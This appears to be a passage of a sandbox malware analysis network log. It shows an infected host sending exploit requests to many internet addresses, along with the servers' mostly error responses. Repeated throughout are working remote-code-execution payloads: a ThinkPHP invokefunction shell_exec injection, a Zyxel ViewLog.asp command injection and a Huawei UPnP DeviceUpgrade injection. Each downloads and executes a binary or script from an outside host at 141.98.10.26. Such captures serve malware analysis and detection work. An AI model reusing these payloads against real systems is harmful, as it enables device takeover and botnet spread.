Nov 22, 2023 08:40:01.077613115 CET	15881	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:01.465593100 CET	15984	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:40:01 GMT Content-Type: text/html Content-Length: 150 Connection: close X-Via: 1.1 PS-XMN-01k8V70:0 (Cdn Cache Server V2.0) Link: https://www.cdnetworks.com/cdn360/; rel="blocked-by" x-ws-request-id: 655db051_PS-XMN-01k8V70_25760-21765 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
Nov 22, 2023 08:40:01.566622972 CET	15998	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:40:01 GMT Content-Type: text/html Content-Length: 150 Connection: close X-Via: 1.1 PS-XMN-01k8V70:0 (Cdn Cache Server V2.0) Link: https://www.cdnetworks.com/cdn360/; rel="blocked-by" x-ws-request-id: 655db051_PS-XMN-01k8V70_25760-21765 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
Nov 22, 2023 08:40:01.775716066 CET	16002	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:40:01 GMT Content-Type: text/html Content-Length: 150 Connection: close X-Via: 1.1 PS-XMN-01k8V70:0 (Cdn Cache Server V2.0) Link: https://www.cdnetworks.com/cdn360/; rel="blocked-by" x-ws-request-id: 655db051_PS-XMN-01k8V70_25760-21765 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
778	192.168.2.23	46504	95.85.185.234	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:01.183723927 CET	15886	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
779	192.168.2.23	42846	94.120.228.119	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:01.251173973 CET	15947	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
780	192.168.2.23	43262	112.151.46.206	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:01.271369934 CET	15957	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:01.565875053 CET	15997	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:40:01 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
781	192.168.2.23	33148	88.221.202.173	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:01.772778988 CET	16002	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:01.973195076 CET	16008	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:01 GMT Date: Wed, 22 Nov 2023 07:40:01 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 62 62 35 33 65 31 37 26 23 34 36 3b 31 37 30 30 36 33 38 38 30 31 26 23 34 36 3b 31 35 33 64 30 31 63 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.9bb53e17.1700638801.153d01cc</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
782	192.168.2.23	35538	41.42.81.189	37215

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:01.779234886 CET	16003	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Nov 22, 2023 08:40:02.090346098 CET	16011	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/xml; charset="utf-8" Server: Linux UPnP/1.0 Huawei-ATP-IGD EXT: Connection: Keep-Alive Content-Length: 398

Session ID	Source IP	Source Port	Destination IP	Destination Port
783	192.168.2.23	47866	88.116.156.78	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:01.783128023 CET	16004	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:01.995959044 CET	16010	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Wed, 22 Nov 2023 07:39:18 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
784	192.168.2.23	46354	88.147.94.180	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:01.791558027 CET	16004	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
785	192.168.2.23	58040	88.81.88.140	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:01.855251074 CET	16006	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:02.142056942 CET	16012	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Wed, 22 Nov 2023 07:40:02 GMT Server: lighttpd/1.4.39 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
786	192.168.2.23	41236	85.131.120.80	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:02.489871025 CET	16101	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:02.721632004 CET	16111	IN	HTTP/1.1 404 Not Found Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type Content-Type: text/html Content-Length: 345 Date: Wed, 22 Nov 2023 07:40:02 GMT Server: WebServer Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
787	192.168.2.23	42506	94.131.63.162	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:02.590708971 CET	16103	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:02.691760063 CET	16107	IN	HTTP/1.1 400 Bad Request Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Wed, 22 Nov 2023 07:40:02 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3572 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, s

Session ID	Source IP	Source Port	Destination IP	Destination Port
788	192.168.2.23	42336	95.216.199.171	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:02.685008049 CET	16105	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:02.885281086 CET	16125	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
789	192.168.2.23	38660	62.84.109.142	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:02.697519064 CET	16110	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
